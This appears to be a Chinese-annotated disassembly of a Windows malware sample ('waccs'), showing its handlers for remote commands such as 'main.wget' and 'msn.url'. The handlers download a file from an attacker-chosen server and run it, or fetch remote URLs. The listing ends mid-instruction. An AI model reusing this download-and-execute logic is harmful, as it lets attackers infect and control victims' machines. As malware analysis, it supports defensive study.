00401A41 6A 00 PUSH 0 00401A43 8B45 08 MOV EAX,DWORD PTR SS:[EBP+8] 00401A46 FFB0 10010000 PUSH DWORD PTR DS:[EAX+110] 00401A4C FF15 70804000 CALL DWORD PTR DS:[408070] ; kernel32.TerminateThread(结束线程). 00401A52 8B45 FC MOV EAX,DWORD PTR SS:[EBP-4] 00401A55 83BC85 68FEFFFF>CMP DWORD PTR SS:[EBP+EAX4-198],0 00401A5D 75 05 JNZ SHORT waccs.00401A64 00401A5F E9 2F040000 JMP waccs.00401E93 ; 返回(退出)该函数. 00401A64 8B45 FC MOV EAX,DWORD PTR SS:[EBP-4] 00401A67 FFB485 64FEFFFF PUSH DWORD PTR SS:[EBP+EAX4-19C] 00401A6E 68 C2143DAE PUSH AE3D14C2 00401A73 8D8D 70F4FFFF LEA ECX,DWORD PTR SS:[EBP-B90] 00401A79 E8 F80F0000 CALL waccs.00402A76 ; ASCII "main.wget" 00401A7E 50 PUSH EAX 00401A7F E8 1E560000 CALL waccs.004070A2 ; JMP 到 msvcrt.strcmp(判断指令只否为"main.wget"). 00401A84 59 POP ECX 00401A85 59 POP ECX 00401A86 F7D8 NEG EAX 00401A88 1BC0 SBB EAX,EAX 00401A8A 40 INC EAX 00401A8B 8885 7CF4FFFF MOV BYTE PTR SS:[EBP-B84],AL 00401A91 8D8D 70F4FFFF LEA ECX,DWORD PTR SS:[EBP-B90] 00401A97 E8 52060000 CALL waccs.004020EE ; 清除内存数据. 00401A9C 0FB685 7CF4FFFF MOVZX EAX,BYTE PTR SS:[EBP-B84] 00401AA3 85C0 TEST EAX,EAX 00401AA5 74 78 JE SHORT waccs.00401B1F ; 判断是否该执行"main.wget"命令. 00401AA7 80A5 58FDFFFF 0>AND BYTE PTR SS:[EBP-2A8],0 00401AAE 68 04010000 PUSH 104 00401AB3 8B45 FC MOV EAX,DWORD PTR SS:[EBP-4] 00401AB6 FFB485 68FEFFFF PUSH DWORD PTR SS:[EBP+EAX4-198] 00401ABD 8D85 59FDFFFF LEA EAX,DWORD PTR SS:[EBP-2A7] 00401AC3 50 PUSH EAX 00401AC4 E8 D3550000 CALL waccs.0040709C ; JMP 到 msvcrt.strncpy 00401AC9 83C4 0C ADD ESP,0C 00401ACC 8B45 08 MOV EAX,DWORD PTR SS:[EBP+8] 00401ACF 8985 60FEFFFF MOV DWORD PTR SS:[EBP-1A0],EAX 00401AD5 8D85 58FDFFFF LEA EAX,DWORD PTR SS:[EBP-2A8] 00401ADB 50 PUSH EAX 00401ADC 6A 00 PUSH 0 00401ADE 68 143A4000 PUSH waccs.00403A14 00401AE3 E8 AE550000 CALL waccs.00407096 ; JMP 到 msvcrt._beginthread(创建一个子线程，线程执行函数地址为：00403A14).(线程功能：下载骇客指定远程服务器站点的其它程序，并自动调用运行). 00401AE8 83C4 0C ADD ESP,0C 00401AEB 83A5 54FDFFFF 0>AND DWORD PTR SS:[EBP-2AC],0 00401AF2 EB 0D JMP SHORT waccs.00401B01 00401AF4 8B85 54FDFFFF MOV EAX,DWORD PTR SS:[EBP-2AC] 00401AFA 40 INC EAX 00401AFB 8985 54FDFFFF MOV DWORD PTR SS:[EBP-2AC],EAX 00401B01 0FB685 58FDFFFF MOVZX EAX,BYTE PTR SS:[EBP-2A8] 00401B08 85C0 TEST EAX,EAX 00401B0A 75 13 JNZ SHORT waccs.00401B1F 00401B0C 83BD 54FDFFFF 5>CMP DWORD PTR SS:[EBP-2AC],50 00401B13 7D 0A JGE SHORT waccs.00401B1F 00401B15 6A 19 PUSH 19 00401B17 FF15 6C804000 CALL DWORD PTR DS:[40806C] ; kernel32.Sleep(等待). 00401B1D ^ EB D5 JMP SHORT waccs.00401AF4 00401B1F 8B45 FC MOV EAX,DWORD PTR SS:[EBP-4] 00401B22 83BC85 70FEFFFF>CMP DWORD PTR SS:[EBP+EAX4-190],0 00401B2A 75 05 JNZ SHORT waccs.00401B31 00401B2C E9 62030000 JMP waccs.00401E93 ; 返回(退出)该函数. 00401B31 8B45 FC MOV EAX,DWORD PTR SS:[EBP-4] 00401B34 FFB485 64FEFFFF PUSH DWORD PTR SS:[EBP+EAX4-19C] 00401B3B 68 4378F788 PUSH 88F77843 00401B40 8D8D 60F4FFFF LEA ECX,DWORD PTR SS:[EBP-BA0] 00401B46 E8 8B0F0000 CALL waccs.00402AD6 ; ASCII "msn.self" 00401B4B 50 PUSH EAX 00401B4C E8 51550000 CALL waccs.004070A2 ; JMP 到 msvcrt.strcmp(判断指令只否为"msn.self"). 00401B51 59 POP ECX 00401B52 59 POP ECX 00401B53 F7D8 NEG EAX 00401B55 1BC0 SBB EAX,EAX 00401B57 40 INC EAX 00401B58 8885 6CF4FFFF MOV BYTE PTR SS:[EBP-B94],AL 00401B5E 8D8D 60F4FFFF LEA ECX,DWORD PTR SS:[EBP-BA0] 00401B64 E8 5D050000 CALL waccs.004020C6 ; 清除内存数据. 00401B69 0FB685 6CF4FFFF MOVZX EAX,BYTE PTR SS:[EBP-B94] 00401B70 85C0 TEST EAX,EAX 00401B72 0F84 52010000 JE waccs.00401CCA ; 判断是否该执行"msn.self"命令. 00401B78 68 20040000 PUSH 420 00401B7D 6A 00 PUSH 0 00401B7F 8D85 34F9FFFF LEA EAX,DWORD PTR SS:[EBP-6CC] 00401B85 50 PUSH EAX 00401B86 E8 AF540000 CALL waccs.0040703A ; JMP 到 msvcrt.memset 00401B8B 83C4 0C ADD ESP,0C 00401B8E 80A5 34F9FFFF 0>AND BYTE PTR SS:[EBP-6CC],0 00401B95 68 04010000 PUSH 104 00401B9A 8B45 FC MOV EAX,DWORD PTR SS:[EBP-4] 00401B9D FFB485 68FEFFFF PUSH DWORD PTR SS:[EBP+EAX4-198] 00401BA4 8D85 41FCFFFF LEA EAX,DWORD PTR SS:[EBP-3BF] 00401BAA 50 PUSH EAX 00401BAB E8 EC540000 CALL waccs.0040709C ; JMP 到 msvcrt.strncpy 00401BB0 83C4 0C ADD ESP,0C 00401BB3 68 04010000 PUSH 104 00401BB8 8B45 FC MOV EAX,DWORD PTR SS:[EBP-4] 00401BBB FFB485 6CFEFFFF PUSH DWORD PTR SS:[EBP+EAX4-194] 00401BC2 8D85 39FAFFFF LEA EAX,DWORD PTR SS:[EBP-5C7] 00401BC8 50 PUSH EAX 00401BC9 E8 CE540000 CALL waccs.0040709C ; JMP 到 msvcrt.strncpy 00401BCE 83C4 0C ADD ESP,0C 00401BD1 68 04010000 PUSH 104 00401BD6 8B45 FC MOV EAX,DWORD PTR SS:[EBP-4] 00401BD9 FFB485 70FEFFFF PUSH DWORD PTR SS:[EBP+EAX4-190] 00401BE0 8D85 3DFBFFFF LEA EAX,DWORD PTR SS:[EBP-4C3] 00401BE6 50 PUSH EAX 00401BE7 E8 B0540000 CALL waccs.0040709C ; JMP 到 msvcrt.strncpy 00401BEC 83C4 0C ADD ESP,0C 00401BEF 8B45 FC MOV EAX,DWORD PTR SS:[EBP-4] 00401BF2 83BC85 74FEFFFF>CMP DWORD PTR SS:[EBP+EAX4-18C],0 00401BFA 74 41 JE SHORT waccs.00401C3D 00401BFC 8B45 FC MOV EAX,DWORD PTR SS:[EBP-4] 00401BFF 83BC85 78FEFFFF>CMP DWORD PTR SS:[EBP+EAX4-188],0 00401C07 74 34 JE SHORT waccs.00401C3D 00401C09 8B45 FC MOV EAX,DWORD PTR SS:[EBP-4] 00401C0C FFB485 74FEFFFF PUSH DWORD PTR SS:[EBP+EAX4-18C] 00401C13 E8 78540000 CALL waccs.00407090 ; JMP 到 msvcrt.atoi 00401C18 59 POP ECX 00401C19 8985 48FDFFFF MOV DWORD PTR SS:[EBP-2B8],EAX 00401C1F 8B45 FC MOV EAX,DWORD PTR SS:[EBP-4] 00401C22 FFB485 78FEFFFF PUSH DWORD PTR SS:[EBP+EAX4-188] 00401C29 E8 62540000 CALL waccs.00407090 ; JMP 到 msvcrt.atoi 00401C2E 59 POP ECX 00401C2F 69C0 60EA0000 IMUL EAX,EAX,0EA60 00401C35 8985 4CFDFFFF MOV DWORD PTR SS:[EBP-2B4],EAX 00401C3B EB 14 JMP SHORT waccs.00401C51 00401C3D C785 48FDFFFF 0>MOV DWORD PTR SS:[EBP-2B8],1 00401C47 C785 4CFDFFFF F>MOV DWORD PTR SS:[EBP-2B4],0FA 00401C51 8B45 08 MOV EAX,DWORD PTR SS:[EBP+8] 00401C54 8985 50FDFFFF MOV DWORD PTR SS:[EBP-2B0],EAX 00401C5A 8B45 08 MOV EAX,DWORD PTR SS:[EBP+8] 00401C5D 83B8 10010000 0>CMP DWORD PTR DS:[EAX+110],0 00401C64 74 11 JE SHORT waccs.00401C77 00401C66 6A 00 PUSH 0 00401C68 8B45 08 MOV EAX,DWORD PTR SS:[EBP+8] 00401C6B FFB0 10010000 PUSH DWORD PTR DS:[EAX+110] 00401C71 FF15 70804000 CALL DWORD PTR DS:[408070] ; kernel32.TerminateThread(结束线程). 00401C77 8D85 34F9FFFF LEA EAX,DWORD PTR SS:[EBP-6CC] 00401C7D 50 PUSH EAX 00401C7E 6A 00 PUSH 0 00401C80 68 FE4C4000 PUSH waccs.00404CFE 00401C85 E8 0C540000 CALL waccs.00407096 ; JMP 到 msvcrt._beginthread(创建一个子线程，线程执行函数地址为：00404CFE).(线程功能：建立连接，访问远程网站信息，下载和删除指定文件等操作). 00401C8A 83C4 0C ADD ESP,0C 00401C8D 8B4D 08 MOV ECX,DWORD PTR SS:[EBP+8] 00401C90 8981 10010000 MOV DWORD PTR DS:[ECX+110],EAX 00401C96 83A5 30F9FFFF 0>AND DWORD PTR SS:[EBP-6D0],0 00401C9D EB 0D JMP SHORT waccs.00401CAC 00401C9F 8B85 30F9FFFF MOV EAX,DWORD PTR SS:[EBP-6D0] 00401CA5 40 INC EAX 00401CA6 8985 30F9FFFF MOV DWORD PTR SS:[EBP-6D0],EAX 00401CAC 0FB685 34F9FFFF MOVZX EAX,BYTE PTR SS:[EBP-6CC] 00401CB3 85C0 TEST EAX,EAX 00401CB5 75 13 JNZ SHORT waccs.00401CCA 00401CB7 83BD 30F9FFFF 5>CMP DWORD PTR SS:[EBP-6D0],50 00401CBE 7D 0A JGE SHORT waccs.00401CCA 00401CC0 6A 19 PUSH 19 00401CC2 FF15 6C804000 CALL DWORD PTR DS:[40806C] ; kernel32.Sleep(等待). 00401CC8 ^ EB D5 JMP SHORT waccs.00401C9F 00401CCA 8B45 FC MOV EAX,DWORD PTR SS:[EBP-4] 00401CCD 83BC85 74FEFFFF>CMP DWORD PTR SS:[EBP+EAX4-18C],0 00401CD5 75 05 JNZ SHORT waccs.00401CDC 00401CD7 E9 B7010000 JMP waccs.00401E93 ; 返回(退出)该函数. 00401CDC 8B45 FC MOV EAX,DWORD PTR SS:[EBP-4] 00401CDF FFB485 64FEFFFF PUSH DWORD PTR SS:[EBP+EAX4-19C] 00401CE6 68 D7A57E24 PUSH 247EA5D7 00401CEB 8D8D 54F4FFFF LEA ECX,DWORD PTR SS:[EBP-BAC] 00401CF1 E8 400E0000 CALL waccs.00402B36 ; ASCII "msn.url" 00401CF6 50 PUSH EAX 00401CF7 E8 A6530000 CALL waccs.004070A2 ; JMP 到 msvcrt.strcmp(判断指令只否为"msn.url"). 00401CFC 59 POP ECX 00401CFD 59 POP ECX 00401CFE F7D8 NEG EAX 00401D00 1BC0 SBB EAX,EAX 00401D02 40 INC EAX 00401D03 8885 5CF4FFFF MOV BYTE PTR SS:[EBP-BA4],AL 00401D09 8D8D 54F4FFFF LEA ECX,DWORD PTR SS:[EBP-BAC] 00401D0F E8 C2020000 CALL waccs.00401FD6 ; 清除内存数据. 00401D14 0FB685 5CF4FFFF MOVZX EAX,BYTE PTR SS:[EBP-BA4] 00401D1B 85C0 TEST EAX,EAX 00401D1D 0F84 70010000 JE waccs.00401E93 ; 判断是否该执行"msn.url"命令. 00401D23 68 20040000 PUSH 420 00401D28 6A 00 PUSH 0 00401D2A 8D85 10F5FFFF LEA EAX,DWORD PTR SS:[EBP-AF0] 00401D30 50 PUSH EAX 00401D31 E8 04530000 CALL waccs.0040703A ; JMP 到 msvcrt.memset 00401D36 83C4 0C ADD ESP,0C 00401D39 80A5 10F5FFFF 0>AND BYTE PTR SS:[EBP-AF0],0 00401D40 68 04010000 PUSH 104 00401D45 8B45 FC MOV EAX,DWORD PTR SS:[EBP-4] 00401D48 FFB485 68FEFFFF PUSH DWORD PTR SS:[EBP+EAX4-198] 00401D4F 8D85 1DF8FFFF LEA EAX,DWORD PTR SS:[EBP-7E3] 00401D55 50 PUSH EAX 00401D56 E8 41530000 CALL waccs.0040709C ; JMP 到 msvcrt.strncpy 00401D5B 83C4 0C ADD ESP,0C 00401D5E 68 04010000 PUSH 104 00401D63 8B45 FC MOV EAX,DWORD PTR SS:[EBP-4] 00401D66 FFB485 6CFEFFFF PUSH DWORD PTR SS:[EBP+EAX4-194] 00401D6D 8D85 11F5FFFF LEA EAX,DWORD PTR SS:[EBP-AEF] 00401D73 50 PUSH EAX 00401D74 E8 23530000 CALL waccs.0040709C ; JMP 到 msvcrt.strncpy 00401D79 83C4 0C ADD ESP,0C 00401D7C 68 04010000 PUSH 104 00401D81 8B45 FC MOV EAX,DWORD PTR SS:[EBP-4] 00401D84 FFB485 70FEFFFF PUSH DWORD PTR SS:[EBP+EAX4-190] 00401D8B 8D85 15F6FFFF LEA EAX,DWORD PTR SS:[EBP-9EB] 00401D91 50 PUSH EAX 00401D92 E8 05530000 CALL waccs.0040709C ; JMP 到 msvcrt.strncpy 00401D97 83C4 0C ADD ESP,0C 00401D9A 68 04010000 PUSH 104 00401D9F 8B45 FC MOV EAX,DWORD PTR SS:[EBP-4] 00401DA2 FFB485 74FEFFFF PUSH DWORD PTR SS:[EBP+EAX4-18C] 00401DA9 8D85 19F7FFFF LEA EAX,DWORD PTR SS:[EBP-8E7] 00401DAF 50 PUSH EAX 00401DB0 E8 E7520000 CALL waccs.0040709C ; JMP 到 msvcrt.strncpy 00401DB5 83C4 0C ADD ESP,0C 00401DB8 8B45 FC MOV EAX,DWORD PTR SS:[EBP-4] 00401DBB 83BC85 78FEFFFF>CMP DWORD PTR SS:[EBP+EAX4-188],0 00401DC3 74 41 JE SHORT waccs.00401E06 00401DC5 8B45 FC MOV EAX,DWORD PTR SS:[EBP-4] 00401DC8 83BC85 7CFEFFFF>CMP DWORD PTR SS:[EBP+EAX4-184],0 00401DD0 74 34 JE SHORT waccs.00401E06 00401DD2 8B45 FC MOV EAX,DWORD PTR SS:[EBP-4] 00401DD5 FFB485 78FEFFFF PUSH DWORD PTR SS:[EBP+EAX4-188] 00401DDC E8 AF520000 CALL waccs.00407090 ; JMP 到 msvcrt.atoi 00401DE1 59 POP ECX 00401DE2 8985 24F9FFFF MOV DWORD PTR SS:[EBP-6DC],EAX 00401DE8 8B45 FC MOV EAX,DWORD PTR SS:[EBP-4] 00401DEB FFB485 7CFEFFFF PUSH DWORD PTR SS:[EBP+EAX4-184] 00401DF2 E8 99520000 CALL waccs.00407090 ; JMP 到 msvcrt.atoi 00401DF7 59 POP ECX 00401DF8 69C0 60EA0000 IMUL EAX,EAX,0EA60 00401DFE 8985 28F9FFFF MOV DWORD PTR SS:[EBP-6D8],EAX 00401E04 EB 14 JMP SHORT waccs.00401E1A 00401E06 C785 24F9FFFF 0>MOV DWORD PTR SS:[EBP-6DC],1 00401E10 C785 28F9FFFF F>MOV DWORD PTR SS:[EBP-6D8],0FA 00401E1A 8B45 08 MOV EAX,DWORD PTR SS:[EBP+8] 00401E1D 8985 2CF9FFFF MOV DWORD PTR SS:[EBP-6D4],EAX 00401E23 8B45 08 MOV EAX,DWORD PTR SS:[EBP+8] 00401E26 83B8 10010000 0>CMP DWORD PTR DS:[EAX+110],0 00401E2D 74 11 JE SHORT waccs.00401E40 00401E2F 6A 00 PUSH 0 00401E31 8B45 08 MOV EAX,DWORD PTR SS:[EBP+8] 00401E34 FFB0 10010000 PUSH DWORD PTR DS:[EAX+110] 00401E3A FF15 70804000 CALL DWORD PTR DS:[408070] ; kernel32.TerminateThread(结束线程). 00401E40 8D85 10F5FFFF LEA EAX,DWORD PTR SS:[EBP-AF0] 00401E46 50 PUSH EAX 00401E47 6A 00 PUSH 0 00401E49 68 FE4C4000 PUSH waccs.00404CFE 00401E4E E8 43520000 CALL waccs.00407096 ; JMP 到 msvcrt._beginthread(创建一个子线程，线程执行函数地址为：00404CFE).(线程功能：建立连接，访问远程网站信息，下载和删除指定文件等操作). 00401E53 83C4 0C ADD ESP,0C 00401E56 8B4D 08 MOV ECX,DWORD PTR SS:[EBP+8] 00401E59 8981 10010000 MOV DWORD PTR DS:[ECX+110],EAX 00401E5F 83A5 0CF5FFFF 0>AND DWORD PTR SS:[EBP-AF4],0 00401E66 EB 0D JMP SHORT waccs.00401E75 00401E68 8B85 0CF5FFFF MOV EAX,DWORD PTR SS:[EBP-AF4] 00401E6E 40 INC EAX 00401E6F 8985 0CF5FFFF MOV DWORD PTR SS:[EBP-AF4],EAX 00401E75 0FB685 10F5FFFF MOVZX EAX,BYTE PTR SS:[EBP-AF0] 00401E7C 85C0 TEST EAX,EAX 00401E7E 75 13 JNZ SHORT waccs.00401E93 00401E80 83BD 0CF5FFFF 5>CMP DWORD PTR SS:[EBP-AF4],50 00401E87 7D 0A JGE SHORT waccs.00401E93 00401E89 6A 19 PUSH 19 00401E8B FF15 6C804000 CALL DWORD PTR DS:[40806C] ; kernel32.Sleep(等待). 00401E91 ^ EB D5 JMP SHORT waccs.00401E68 00401E93 5F POP EDI 00401E94 C9 LEAVE 00401E95 C3 RETN ; 返回. 下载骇客指定远程服务器站点的其它程序，并自动调用运行： 00403A14 55 PUSH EBP 00403A15 8BEC MOV EBP,ESP 00403A17 81EC 6C030000 SUB ESP,36C 00403A1D 56 PUSH ESI 00403A1E 57 PUSH EDI 00403A1F 8B75 08 MOV ESI,DWORD PTR SS:[EBP+8] 00403A22 6A 43 PUSH 43 00403A24 59 POP ECX 00403A25 8DBD F0FDFFFF LEA EDI,DWORD PTR SS:[EBP-210] 00403A2B F3:A5 REP MOVS DWORD PTR ES:[EDI],DWORD PTR DS> 00403A2D 8B45 08 MOV EAX,DWORD PTR SS:[EBP+8] 00403A30 8985 E8FCFFFF MOV DWORD PTR SS:[EBP-318],EAX 00403A36 8B85 E8FCFFFF MOV EAX,DWORD PTR SS:[EBP-318] 00403A3C C600 01 MOV BYTE PTR DS:[EAX],1 00403A3F FF15 68804000 CALL DWORD PTR DS:[408068] ; kernel32.GetTickCount 00403A45 50 PUSH EAX 00403A46 E8 01360000 CALL waccs.0040704C ; JMP 到 msvcrt.srand 00403A4B 59 POP ECX 00403A4C 68 04010000 PUSH 104 00403A51 6A 00 PUSH 0 00403A53 8D85 FCFEFFFF LEA EAX,DWORD PTR SS:[EBP-104] 00403A59 50 PUSH EAX 00403A5A E8 DB350000 CALL waccs.0040703A ; JMP 到 msvcrt.memset 00403A5F 83C4 0C ADD ESP,0C 00403A62 68 04010000 PUSH 104 00403A67 6A 00 PUSH 0 00403A69 8D85 ECFCFFFF LEA EAX,DWORD PTR SS:[EBP-314] 00403A6F 50 PUSH EAX 00403A70 E8 C5350000 CALL waccs.0040703A ; JMP 到 msvcrt.memset 00403A75 83C4 0C ADD ESP,0C 00403A78 8D85 ECFCFFFF LEA EAX,DWORD PTR SS:[EBP-314] 00403A7E 50 PUSH EAX 00403A7F 68 04010000 PUSH 104 00403A84 FF15 A4804000 CALL DWORD PTR DS:[4080A4] ; kernel32.GetTempPathA 00403A8A E8 B7350000 CALL waccs.00407046 ; JMP 到 msvcrt.rand 00403A8F 99 CDQ 00403A90 6A 09 PUSH 9 00403A92 59 POP ECX 00403A93 F7F9 IDIV ECX 00403A95 52 PUSH EDX 00403A96 E8 AB350000 CALL waccs.00407046 ; JMP 到 msvcrt.rand 00403A9B 99 CDQ 00403A9C 6A 09 PUSH 9 00403A9E 59 POP ECX 00403A9F F7F9 IDIV ECX 00403AA1 52 PUSH EDX 00403AA2 8D85 ECFCFFFF LEA EAX,DWORD PTR SS:[EBP-314] 00403AA8 50 PUSH EAX 00403AA9 68 D95B0021 PUSH 21005BD9 00403AAE 8D8D D8FCFFFF LEA ECX,DWORD PTR SS:[EBP-328] 00403AB4 E8 6C090000 CALL waccs.00404425 00403AB9 50 PUSH EAX 00403ABA 68 04010000 PUSH 104 00403ABF 8D85 FCFEFFFF LEA EAX,DWORD PTR SS:[EBP-104] 00403AC5 50 PUSH EAX 00403AC6 E8 75350000 CALL waccs.00407040 ; JMP 到 msvcrt._snprintf 00403ACB 83C4 18 ADD ESP,18 00403ACE 8D8D D8FCFFFF LEA ECX,DWORD PTR SS:[EBP-328] 00403AD4 E8 9DE5FFFF CALL waccs.00402076 00403AD9 6A 00 PUSH 0 00403ADB 6A 00 PUSH 0 00403ADD 8D85 FCFEFFFF LEA EAX,DWORD PTR SS:[EBP-104] 00403AE3 50 PUSH EAX 00403AE4 8D85 F1FDFFFF LEA EAX,DWORD PTR SS:[EBP-20F] 00403AEA 50 PUSH EAX 00403AEB 6A 00 PUSH 0 00403AED E8 C2360000 CALL waccs.004071B4 ; JMP 到 urlmon.URLDownloadToFileA 00403AF2 8985 E4FCFFFF MOV DWORD PTR SS:[EBP-31C],EAX 00403AF8 83BD E4FCFFFF 0>CMP DWORD PTR SS:[EBP-31C],0 00403AFF 75 6A JNZ SHORT waccs.00403B6B 00403B01 6A 00 PUSH 0 00403B03 6A 00 PUSH 0 00403B05 6A 00 PUSH 0 00403B07 8D85 FCFEFFFF LEA EAX,DWORD PTR SS:[EBP-104] 00403B0D 50 PUSH EAX 00403B0E 68 AC9D4000 PUSH waccs.00409DAC ; ASCII "open" 00403B13 6A 00 PUSH 0 00403B15 FF15 74814000 CALL DWORD PTR DS:[408174] ; SHELL32.ShellExecuteA 00403B1B 8D85 FCFEFFFF LEA EAX,DWORD PTR SS:[EBP-104] 00403B21 50 PUSH EAX 00403B22 8D85 F1FDFFFF LEA EAX,DWORD PTR SS:[EBP-20F] 00403B28 50 PUSH EAX 00403B29 68 B49D4000 PUSH waccs.00409DB4 00403B2E 68 B89D4000 PUSH waccs.00409DB8 00403B33 8B85 F8FEFFFF MOV EAX,DWORD PTR SS:[EBP-108] 00403B39 05 D3000000 ADD EAX,0D3 00403B3E 50 PUSH EAX 00403B3F 68 D32B4F0A PUSH 0A4F2BD3 00403B44 8D8D B4FCFFFF LEA ECX,DWORD PTR SS:[EBP-34C] 00403B4A E8 36090000 CALL waccs.00404485 00403B4F 50 PUSH EAX 00403B50 FFB5 F8FEFFFF PUSH DWORD PTR SS:[EBP-108] 00403B56 E8 A5D4FFFF CALL waccs.00401000 00403B5B 83C4 1C ADD ESP,1C 00403B5E 8D8D B4FCFFFF LEA ECX,DWORD PTR SS:[EBP-34C] 00403B64 E8 FC060000 CALL waccs.00404265 00403B69 EB 40 JMP SHORT waccs.00403BAB 00403B6B 68 E09D4000 PUSH waccs.00409DE0 00403B70 68 E49D4000 PUSH waccs.00409DE4 00403B75 8B85 F8FEFFFF MOV EAX,DWORD PTR SS:[EBP-108] 00403B7B 05 D3000000 ADD EAX,0D3 00403B80 50 PUSH EAX 00403B81 68 4AF075C1 PUSH C175F04A 00403B86 8D8D 94FCFFFF LEA ECX,DWORD PTR SS:[EBP-36C] 00403B8C E8 54090000 CALL waccs.004044E5 00403B91 50 PUSH EAX 00403B92 FFB5 F8FEFFFF PUSH DWORD PTR SS:[EBP-108] 00403B98 E8 63D4FFFF CALL waccs.00401000 00403B9D 83C4 14 ADD ESP,14 00403BA0 8D8D 94FCFFFF LEA ECX,DWORD PTR SS:[EBP-36C] 00403BA6 E8 E2060000 CALL waccs.0040428D 00403BAB 5F POP EDI 00403BAC 5E POP ESI 00403BAD C9 LEAVE 00403BAE C3 RETN ; 返回. 建立连接，访问远程网站信息，下载和删除指定文件等操作： 00404CFE 55 PUSH EBP 00404CFF 8BEC MOV EBP,ESP 00404D01 B8 5C190000 MOV EAX,195C 00404D06 E8 55230000 CALL waccs.00407060 00404D0B 56 PUSH ESI 00404D0C 57 PUSH EDI 00404D0D 8B75 08 MOV ESI,DWORD PTR SS:[EBP+8] 00404D10 B9 08010000 MOV ECX,108 00404D15 8DBD 3CE8FFFF LEA EDI,DWORD PTR SS:[EBP-17C4] 00404D1B F3:A5 REP MOVS DWORD PTR ES:[EDI],DWORD PTR DS> 00404D1D 8B45 08 MOV EAX,DWORD PTR SS:[EBP+8] 00404D20 8985 28E8FFFF MOV DWORD PTR SS:[EBP-17D8],EAX 00404D26 8B85 28E8FFFF MOV EAX,DWORD PTR SS:[EBP-17D8] 00404D2C C600 01 MOV BYTE PTR DS:[EAX],1 00404D2F 83A5 68EEFFFF 0>AND DWORD PTR SS:[EBP-1198],0 00404D36 6A 63 PUSH 63 00404D38 59 POP ECX 00404D39 33C0 XOR EAX,EAX 00404D3B 8DBD 6CEEFFFF LEA EDI,DWORD PTR SS:[EBP-1194] 00404D41 F3:AB REP STOS DWORD PTR ES:[EDI] 00404D43 8D85 FCEFFFFF LEA EAX,DWORD PTR SS:[EBP-1004] 00404D49 8985 60EDFFFF MOV DWORD PTR SS:[EBP-12A0],EAX 00404D4F 68 04010000 PUSH 104 00404D54 6A 00 PUSH 0 00404D56 8D85 64EDFFFF LEA EAX,DWORD PTR SS:[EBP-129C] 00404D5C 50 PUSH EAX 00404D5D E8 D8220000 CALL waccs.0040703A ; JMP 到 msvcrt.memset 00404D62 83C4 0C ADD ESP,0C 00404D65 68 04010000 PUSH 104 00404D6A 6A 00 PUSH 0 00404D6C 8D85 1CE7FFFF LEA EAX,DWORD PTR SS:[EBP-18E4] 00404D72 50 PUSH EAX 00404D73 E8 C2220000 CALL waccs.0040703A ; JMP 到 msvcrt.memset 00404D78 83C4 0C ADD ESP,0C 00404D7B 68 04010000 PUSH 104 00404D80 6A 00 PUSH 0 00404D82 8D85 5CECFFFF LEA EAX,DWORD PTR SS:[EBP-13A4] 00404D88 50 PUSH EAX 00404D89 E8 AC220000 CALL waccs.0040703A ; JMP 到 msvcrt.memset 00404D8E 83C4 0C ADD ESP,0C 00404D91 68 90010000 PUSH 190 00404D96 6A 00 PUSH 0 00404D98 8D85 68EEFFFF LEA EAX,DWORD PTR SS:[EBP-1198] 00404D9E 50 PUSH EAX 00404D9F E8 96220000 CALL waccs.0040703A ; JMP 到 msvcrt.memset 00404DA4 83C4 0C ADD ESP,0C 00404DA7 83A5 20E8FFFF 0>AND DWORD PTR SS:[EBP-17E0],0 00404DAE 83A5 30E8FFFF 0>AND DWORD PTR SS:[EBP-17D0],0 00404DB5 83A5 F8EFFFFF 0>AND DWORD PTR SS:[EBP-1008],0 00404DBC 6A 00 PUSH 0 00404DBE 6A 00 PUSH 0 00404DC0 6A 00 PUSH 0 00404DC2 6A 00 PUSH 0 00404DC4 68 40084B19 PUSH 194B0840 00404DC9 8D8D FCE6FFFF LEA ECX,DWORD PTR SS:[EBP-1904] 00404DCF E8 A5040000 CALL waccs.00405279 00404DD4 50 PUSH EAX 00404DD5 FF15 B4814000 CALL DWORD PTR DS:[4081B4] ; WININET.InternetOpenA 00404DDB 8985 20E8FFFF MOV DWORD PTR SS:[EBP-17E0],EAX 00404DE1 8D8D FCE6FFFF LEA ECX,DWORD PTR SS:[EBP-1904] 00404DE7 E8 C2D1FFFF CALL waccs.00401FAE 00404DEC 83BD 20E8FFFF 0>CMP DWORD PTR SS:[EBP-17E0],0 00404DF3 75 05 JNZ SHORT waccs.00404DFA 00404DF5 E8 AE220000 CALL waccs.004070A8 ; JMP 到 msvcrt._endthread 00404DFA 6A 00 PUSH 0 00404DFC 6A 00 PUSH 0 00404DFE 6A 00 PUSH 0 00404E00 6A 00 PUSH 0 00404E02 8D85 49EBFFFF LEA EAX,DWORD PTR SS:[EBP-14B7] 00404E08 50 PUSH EAX 00404E09 FFB5 20E8FFFF PUSH DWORD PTR SS:[EBP-17E0] 00404E0F FF15 B8814000 CALL DWORD PTR DS:[4081B8] ; WININET.InternetOpenUrlA 00404E15 8985 30E8FFFF MOV DWORD PTR SS:[EBP-17D0],EAX 00404E1B 83BD 30E8FFFF 0>CMP DWORD PTR SS:[EBP-17D0],0 00404E22 75 05 JNZ SHORT waccs.00404E29 00404E24 E8 7F220000 CALL waccs.004070A8 ; JMP 到 msvcrt._endthread 00404E29 8D85 F8EFFFFF LEA EAX,DWORD PTR SS:[EBP-1008] 00404E2F 50 PUSH EAX 00404E30 68 00100000 PUSH 1000 00404E35 8D85 FCEFFFFF LEA EAX,DWORD PTR SS:[EBP-1004] 00404E3B 50 PUSH EAX 00404E3C FFB5 30E8FFFF PUSH DWORD PTR SS:[EBP-17D0] 00404E42 FF15 BC814000 CALL DWORD PTR DS:[4081BC] ; WININET.InternetReadFile 00404E48 85C0 TEST EAX,EAX 00404E4A 75 05 JNZ SHORT waccs.00404E51 00404E4C E8 57220000 CALL waccs.004070A8 ; JMP 到 msvcrt._endthread 00404E51 83A5 18E7FFFF 0>AND DWORD PTR SS:[EBP-18E8],0 00404E58 68 DA43FADE PUSH DEFA43DA 00404E5D 8D8D F4E6FFFF LEA ECX,DWORD PTR SS:[EBP-190C] 00404E63 E8 71040000 CALL waccs.004052D9 00404E68 50 PUSH EAX 00404E69 FFB5 60EDFFFF PUSH DWORD PTR SS:[EBP-12A0] 00404E6F E8 DE210000 CALL waccs.00407052 ; JMP 到 msvcrt.strstr 00404E74 59 POP ECX 00404E75 59 POP ECX 00404E76 8985 34E8FFFF MOV DWORD PTR SS:[EBP-17CC],EAX 00404E7C 8B85 34E8FFFF MOV EAX,DWORD PTR SS:[EBP-17CC] 00404E82 8985 F8E6FFFF MOV DWORD PTR SS:[EBP-1908],EAX 00404E88 8D8D 